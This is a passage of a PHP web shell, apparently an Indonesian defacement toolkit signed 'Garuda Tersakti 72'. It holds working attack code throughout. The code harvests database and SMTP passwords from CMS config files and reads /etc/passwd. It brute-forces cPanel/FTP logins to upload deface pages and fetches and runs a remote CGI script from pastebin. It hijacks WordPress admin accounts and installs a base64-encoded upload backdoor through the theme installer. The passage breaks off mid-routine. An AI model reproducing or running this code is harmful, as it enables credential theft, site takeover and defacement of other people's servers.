  1561. echo "$user_cp\n";
  1562. }
  1563. }
  1564. }
  1565. }
  1566. echo "</textarea><br>
  1567. PASS: <br>
  1568. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1569. function cp_pass($dir) {
  1570. $pass = "";
  1571. $dira = scandir($dir);
  1572. foreach($dira as $dirb) {
  1573. if(!is_file("$dir/$dirb")) continue;
  1574. $ambil = file_get_contents("$dir/$dirb");
  1575. if(preg_match("/WordPress/", $ambil)) {
  1576. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1577. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1578. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1579. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1580. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1581. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1582. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1583. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1584. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1585. } elseif(preg_match("/^[client]$/", $ambil)) {
  1586. preg_match("/password=(.*?)/", $ambil, $pass1);
  1587. if(preg_match('/"/', $pass1[1])) {
  1588. $pass1[1] = str_replace('"', "", $pass1[1]);
  1589. $pass .= $pass1[1]."\n";
  1590. } else {
  1591. $pass .= $pass1[1]."\n";
  1592. }
  1593. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1594. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1595. }
  1596. }
  1597. echo $pass;
  1598. }
  1599. $cp_pass = cp_pass($dir);
  1600. echo $cp_pass;
  1601. echo "</textarea><br>
  1602. <input type='submit' name='crack' class='btn btn-success btn-sm' style='width: 450px;' value='Crack'>
  1603. </form>
  1604. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1605. }
  1606. } elseif($_GET['do'] == 'cpftp_auto') {
  1607. if($_POST['crack']) {
  1608. $usercp = explode("\r\n", $_POST['user_cp']);
  1609. $passcp = explode("\r\n", $_POST['pass_cp']);
  1610. $i = 0;
  1611. foreach($usercp as $ucp) {
  1612. foreach($passcp as $pcp) {
  1613. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1614. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1615. } else {
  1616. $_SESSION[$ucp] = "1";
  1617. $_SESSION[$pcp] = "1";
  1618. if($ucp == '' || $pcp == '') {
  1619. //
  1620. } else {
  1621. echo "[+] username (<font color=#48D1CC>$ucp</font>) password (<font color=#48D1CC>$pcp</font>)<br>";
  1622. $ftp_conn = ftp_connect($ip);
  1623. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1624. if((!$ftp_login) || (!$ftp_conn)) {
  1625. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1626. } else {
  1627. echo "[+] <font color=#48D1CC>Login Sukses</font><br>";
  1628. $fi = htmlspecialchars($_POST['file_deface']);
  1629. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1630. if($deface) {
  1631. $i++;
  1632. echo "[+] <font color=#48D1CC>Deface Sukses</font><br>";
  1633. if(function_exists('posix_getpwuid')) {
  1634. $domain_cp = file_get_contents("/etc/named.conf");
  1635. if($domain_cp == '') {
  1636. echo "[+] <font color=red>gak bisa ambil nama domain nya</font><br><br>";
  1637. } else {
  1638. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1639. foreach($domains_cp[1] as $dj) {
  1640. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1641. $user_cp_url = $user_cp_url['name'];
  1642. if($user_cp_url == $ucp) {
  1643. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1644. break;
  1645. }
  1646. }
  1647. }
  1648. } else {
  1649. echo "[+] <font color=red>gak bisa ambil nama domain nya</font><br><br>";
  1650. }
  1651. } else {
  1652. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1653. }
  1654. }
  1655. //echo "username (<font color=#48D1CC>$ucp</font>) password (<font color=#48D1CC>$pcp</font>)<br>";
  1656. }
  1657. }
  1658. }
  1659. }
  1660. }
  1661. if($i == 0) {
  1662. } else {
  1663. echo "<br>sukses deface ".$i." Cpanel by <font color=#48D1CC>TN72.</font>";
  1664. }
  1665. } else {
  1666. echo "<center>
  1667. <form method='post'>
  1668. Filename: <br>
  1669. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1670. Deface Page: <br>
  1671. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1672. USER: <br>
  1673. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1674. $_usercp = fopen("/etc/passwd","r");
  1675. while($getu = fgets($_usercp)) {
  1676. if($getu == '' || !$_usercp) {
  1677. echo "<font color=red>Can't read /etc/passwd</font>";
  1678. } else {
  1679. preg_match_all("/(.*?):x:/", $getu, $u);
  1680. foreach($u[1] as $user_cp) {
  1681. if(is_dir("/home/$user_cp/public_html")) {
  1682. echo "$user_cp\n";
  1683. }
  1684. }
  1685. }
  1686. }
  1687. echo "</textarea><br>
  1688. PASS: <br>
  1689. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1690. function cp_pass($dir) {
  1691. $pass = "";
  1692. $dira = scandir($dir);
  1693. foreach($dira as $dirb) {
  1694. if(!is_file("$dir/$dirb")) continue;
  1695. $ambil = file_get_contents("$dir/$dirb");
  1696. if(preg_match("/WordPress/", $ambil)) {
  1697. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1698. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1699. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1700. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1701. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1702. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1703. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1704. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1705. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1706. } elseif(preg_match("/client/", $ambil)) {
  1707. preg_match("/password=(.*)/", $ambil, $pass1);
  1708. if(preg_match('/"/', $pass1[1])) {
  1709. $pass1[1] = str_replace('"', "", $pass1[1]);
  1710. $pass .= $pass1[1]."\n";
  1711. }
  1712. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1713. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1714. }
  1715. }
  1716. echo $pass;
  1717. }
  1718. $cp_pass = cp_pass($dir);
  1719. echo $cp_pass;
  1720. echo "</textarea><br>
  1721. <input type='submit' name='crack' style='width: 450px;' class='btn btn-success btn-sm' value='Hajar'>
  1722. </form>
  1723. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1724. }
  1725. } elseif($_GET['do'] == 'smtp') {
  1726. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1727. function scj($dir) {
  1728. $dira = scandir($dir);
  1729. foreach($dira as $dirb) {
  1730. if(!is_file("$dir/$dirb")) continue;
  1731. $ambil = file_get_contents("$dir/$dirb");
  1732. $ambil = str_replace("$", "", $ambil);
  1733. if(preg_match("/JConfig|joomla/", $ambil)) {
  1734. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1735. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1736. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1737. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1738. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1739. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1740. echo "SMTP Host: <font color=#48D1CC>$smtp_host</font><br>";
  1741. echo "SMTP port: <font color=#48D1CC>$smtp_port</font><br>";
  1742. echo "SMTP user: <font color=#48D1CC>$smtp_user</font><br>";
  1743. echo "SMTP pass: <font color=#48D1CC>$smtp_pass</font><br>";
  1744. echo "SMTP auth: <font color=#48D1CC>$smtp_auth</font><br>";
  1745. echo "SMTP secure: <font color=#48D1CC>$smtp_secure</font><br><br>";
  1746. }
  1747. }
  1748. }
  1749. $smpt_hunter = scj($dir);
  1750. echo $smpt_hunter;
  1751. } elseif($_GET['do'] == 'auto_wp') {
  1752. if($_POST['hajar']) {
  1753. $title = htmlspecialchars($_POST['new_title']);
  1754. $pn_title = str_replace(" ", "-", $title);
  1755. if($_POST['cek_edit'] == "Y") {
  1756. $script = $_POST['edit_content'];
  1757. } else {
  1758. $script = $title;
  1759. }
  1760. $conf = $_POST['config_dir'];
  1761. $scan_conf = scandir($conf);
  1762. foreach($scan_conf as $file_conf) {
  1763. if(!is_file("$conf/$file_conf")) continue;
  1764. $config = file_get_contents("$conf/$file_conf");
  1765. if(preg_match("/WordPress/", $config)) {
  1766. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1767. $dbuser = ambilkata($config,"DB_USER', '","'");
  1768. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1769. $dbname = ambilkata($config,"DB_NAME', '","'");
  1770. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1771. $prefix = $dbprefix."posts";
  1772. $option = $dbprefix."options";
  1773. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1774. $db = mysql_select_db($dbname);
  1775. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1776. $result = mysql_fetch_array($q);
  1777. $id = $result[ID];
  1778. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1779. $result2 = mysql_fetch_array($q2);
  1780. $target = $result2[option_value];
  1781. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1782. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1783. echo "<div style='margin: 5px auto;'>";
  1784. if($target == '') {
  1785. echo "URL: <font color=red>error, gak bisa ambil nama domain nya</font> -> ";
  1786. } else {
  1787. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1788. }
  1789. if(!$update OR !$conn OR !$db) {
  1790. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1791. } else {
  1792. echo "<font color=#18BC9C>sukses di ganti.</font><br>";
  1793. }
  1794. echo "</div>";
  1795. mysql_close($conn);
  1796. }
  1797. }
  1798. } else {
  1799. echo "<center>
  1800. <h1>Auto Edit Title+Content WordPress</h1>
  1801. <form method='post'>
  1802. DIR Config: <br>
  1803. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1804. Set Title: <br>
  1805. <input type='text' name='new_title' value='Hacked by GARUDA TERSAKTI 72' placeholder='New Title'><br><br>
  1806. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1807. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> yaa, up aja gan :P</span><br>
  1808. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1809. <input type='submit' class='btn btn-success btn-sm' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1810. </form>
  1811. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1812. ";
  1813. }
  1814. } elseif($_GET['do'] == 'zoneh') {
  1815. if($_POST['submit']) {
  1816. $domain = explode("\r\n", $_POST['url']);
  1817. $nick = $_POST['nick'];
  1818. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1819. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1820. function zoneh($url,$nick) {
  1821. $ch = curl_init("http://www.zone-h.com/notify/single");
  1822. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1823. curl_setopt($ch, CURLOPT_POST, true);
  1824. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1825. return curl_exec($ch);
  1826. curl_close($ch);
  1827. }
  1828. foreach($domain as $url) {
  1829. $zoneh = zoneh($url,$nick);
  1830. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1831. echo "$url -> <font color=#48D1CC>OK</font><br>";
  1832. } else {
  1833. echo "$url -> <font color=red>ERROR</font><br>";
  1834. }
  1835. }
  1836. } else {
  1837. echo "<center><form method='post'>
  1838. <u>Defacer</u>: <br>
  1839. <input type='text' name='nick' size='50' value='TN72'><br>
  1840. <u>Domains</u>: <br>
  1841. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1842. <input type='submit' class='btn btn-success btn-sm' name='submit' value='Submit' style='width: 450px;'>
  1843. </form>";
  1844. }
  1845. echo "</center>";
  1846. } elseif($_GET['do'] == 'cgi') {
  1847. $cgi_dir = mkdir('idx_cgi', 0755);
  1848. $file_cgi = "idx_cgi/cgi.izo";
  1849. $isi_htcgi = "AddHandler cgi-script .izo";
  1850. $htcgi = fopen(".htaccess", "w");
  1851. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1852. $cgi = fopen($file_cgi, "w");
  1853. fwrite($cgi, $cgi_script);
  1854. fwrite($htcgi, $isi_htcgi);
  1855. chmod($file_cgi, 0755);
  1856. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1857. } elseif($_GET['do'] == 'fake_root') {
  1858. ob_start();
  1859. $cwd = getcwd();
  1860. $ambil_user = explode("/", $cwd);
  1861. $user = $ambil_user[2];
  1862. if($_POST['reverse']) {
  1863. $site = explode("\r\n", $_POST['url']);
  1864. $file = $_POST['file'];
  1865. foreach($site as $url) {
  1866. $cek = getsource("$url/~$user/$file");
  1867. if(preg_match("/hacked/i", $cek)) {
  1868. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=#18BC9C>Fake Root!</font><br>";
  1869. }
  1870. }
  1871. } else {
  1872. echo "<center><form method='post'>
  1873. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1874. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1875. Domain: <br>
  1876. <textarea style='width: 450px; height: 250px;' name='url'>";
  1877. reverse($_SERVER['HTTP_HOST']);
  1878. echo "</textarea><br>
  1879. <input type='submit' class='btn btn-success btn-sm' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1880. </form><br>
  1881. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1882. }
  1883. } elseif($_GET['do'] == 'adminer') {
  1884. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1885. function adminer($url, $isi) {
  1886. $fp = fopen($isi, "w");
  1887. $ch = curl_init();
  1888. curl_setopt($ch, CURLOPT_URL, $url);
  1889. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1890. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1891. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1892. curl_setopt($ch, CURLOPT_FILE, $fp);
  1893. return curl_exec($ch);
  1894. curl_close($ch);
  1895. fclose($fp);
  1896. ob_flush();
  1897. flush();
  1898. }
  1899. if(file_exists('adminer.php')) {
  1900. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1901. } else {
  1902. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1903. echo "<center><font color=#18BC9C><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1904. } else {
  1905. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1906. }
  1907. }
  1908. } elseif($_GET['do'] == 'auto_dwp') {
  1909. if($_POST['auto_deface_wp']) {
  1910. function anucurl($sites) {
  1911. $ch = curl_init($sites);
  1912. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1913. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1914. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1915. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1916. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1917. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1918. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1919. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1920. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1921. $data = curl_exec($ch);
  1922. curl_close($ch);
  1923. return $data;
  1924. }
  1925. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1926. $post = array(
  1927. "log" => "$userr",
  1928. "pwd" => "$pass",
  1929. "rememberme" => "forever",
  1930. "wp-submit" => "$wp_submit",
  1931. "redirect_to" => "$web",
  1932. "testcookie" => "1",
  1933. );
  1934. $ch = curl_init($cek);
  1935. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1936. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1937. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1938. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1939. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1940. curl_setopt($ch, CURLOPT_POST, 1);
  1941. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1942. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1943. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1944. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1945. $data = curl_exec($ch);
  1946. curl_close($ch);
  1947. return $data;
  1948. }
  1949. $scan = $_POST['link_config'];
  1950. $link_config = scandir($scan);
  1951. $script = htmlspecialchars($_POST['script']);
  1952. $user = "GarudaTersakti72";
  1953. $pass = "GarudaTersakti72";
  1954. $passx = md5($pass);
  1955. foreach($link_config as $dir_config) {
  1956. if(!is_file("$scan/$dir_config")) continue;
  1957. $config = file_get_contents("$scan/$dir_config");
  1958. if(preg_match("/WordPress/", $config)) {
  1959. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1960. $dbuser = ambilkata($config,"DB_USER', '","'");
  1961. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1962. $dbname = ambilkata($config,"DB_NAME', '","'");
  1963. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1964. $prefix = $dbprefix."users";
  1965. $option = $dbprefix."options";
  1966. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1967. $db = mysql_select_db($dbname);
  1968. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1969. $result = mysql_fetch_array($q);
  1970. $id = $result[ID];
  1971. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1972. $result2 = mysql_fetch_array($q2);
  1973. $target = $result2[option_value];
  1974. if($target == '') {
  1975. echo "[-] <font color=red>error, gak bisa ambil nama domain nya</font><br>";
  1976. } else {
  1977. echo "[+] $target <br>";
  1978. }
  1979. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1980. if(!$conn OR !$db OR !$update) {
  1981. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1982. mysql_close($conn);
  1983. } else {
  1984. $site = "$target/wp-login.php";
  1985. $site2 = "$target/wp-admin/theme-install.php?upload";
  1986. $b1 = anucurl($site2);
  1987. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1988. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1989. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1990. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1991. $www = "m.php";
  1992. $fp5 = fopen($www,"w");
  1993. fputs($fp5,$upload3);
  1994. $post2 = array(
  1995. "_wpnonce" => "$anu2",
  1996. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1997. "themezip" => "@$www",
  1998. "install-theme-submit" => "Install Now",
  1999. );
  2000. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2001. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2002. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2003. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2004. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2005. curl_setopt($ch, CURLOPT_POST, 1);
  2006. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2007. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2008. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2009. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2010. $data3 = curl_exec($ch);
  2011. curl_close($ch);
  2012. $y = date("Y");
  2013. $m = date("m");
  2014. $namafile = "id.php";
  2015. $fpi = fopen($namafile,"w");
  2016. fputs($fpi,$script);
  2017. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2018. curl_setopt($ch6, CURLOPT_POST, true);
  2019. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2020. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2021. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2022. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2023. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2024. $postResult = curl_exec($ch6);
  2025. curl_close($ch6);
  2026. $as = "$target/k.php";
  2027. $bs = anucurl($as);
  2028. if(preg_match("#$script#is", $bs)) {
  2029. echo "[+] <font color='#18BC9C'>berhasil depes sayang ..</font><br>";
  2030. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2031. } else {
  2032. echo "[-] <font color='red'>gagal depes sayang ..</font><br>";
  2033. echo "[!!] coba aja manual: <br>";
  2034. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2035. echo "[+] username: <font color=#18BC9C>$user</font><br>";
  2036. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
  2037. }
  2038. mysql_close($conn);
  2039. }
  2040. }
  2041. }
  2042. } else {
  2043. echo "<center><h1>WordPress Auto Deface</h1>
  2044. <form method='post'>
  2045. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2046. <input type='text' name='script' height='10' size='50' placeholder='Hacked by GarudaTersakti72' required><br>
  2047. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2048. </form>
  2049. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2050. </center>";
  2051. }
  2052. } elseif($_GET['do'] == 'auto_dwp2') {
  2053. if($_POST['auto_deface_wp']) {
  2054. function anucurl($sites) {
  2055. $ch = curl_init($sites);
  2056. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2057. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2058. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2059. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2060. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2061. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2062. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2063. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2064. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2065. $data = curl_exec($ch);
  2066. curl_close($ch);
  2067. return $data;
  2068. }
  2069. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2070. $post = array(
  2071. "log" => "$userr",
  2072. "pwd" => "$pass",
  2073. "rememberme" => "forever",
  2074. "wp-submit" => "$wp_submit",
  2075. "redirect_to" => "$web",
  2076. "testcookie" => "1",
  2077. );
  2078. $ch = curl_init($cek);
  2079. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2080. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2081. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2082. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2083. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2084. curl_setopt($ch, CURLOPT_POST, 1);
  2085. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2086. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2087. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2088. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2089. $data = curl_exec($ch);
  2090. curl_close($ch);
  2091. return $data;
  2092. }
  2093. $link = explode("\r\n", $_POST['link']);
  2094. $script = htmlspecialchars($_POST['script']);
  2095. $user = "garudatersakti72";
  2096. $pass = "garudatersakti72";
  2097. $passx = md5($pass);
  2098. foreach($link as $dir_config) {
  2099. $config = anucurl($dir_config);
  2100. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2101. $dbuser = ambilkata($config,"DB_USER', '","'");
  2102. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2103. $dbname = ambilkata($config,"DB_NAME', '","'");
  2104. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2105. $prefix = $dbprefix."users";
  2106. $option = $dbprefix."options";
  2107. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2108. $db = mysql_select_db($dbname);
  2109. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2110. $result = mysql_fetch_array($q);
  2111. $id = $result[ID];
  2112. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2113. $result2 = mysql_fetch_array($q2);
  2114. $target = $result2[option_value];
  2115. if($target == '') {
  2116. echo "[-] <font color=red>error, gak bisa ambil nama domain nya</font><br>";
  2117. } else {
  2118. echo "[+] $target <br>";
  2119. }
  2120. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2121. if(!$conn OR !$db OR !$update) {
  2122. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2123. mysql_close($conn);
  2124. } else {
  2125. $site = "$target/wp-login.php";
  2126. $site2 = "$target/wp-admin/theme-install.php?upload";
  2127. $b1 = anucurl($site2);
  2128. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2129. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2130. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2131. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2132. $www = "m.php";
  2133. $fp5 = fopen($www,"w");
  2134. fputs($fp5,$upload3);
  2135. $post2 = array(
  2136. "_wpnonce" => "$anu2",
  2137. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2138. "themezip" => "@$www",
  2139. "install-theme-submit" => "Install Now",
  2140. );
  2141. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
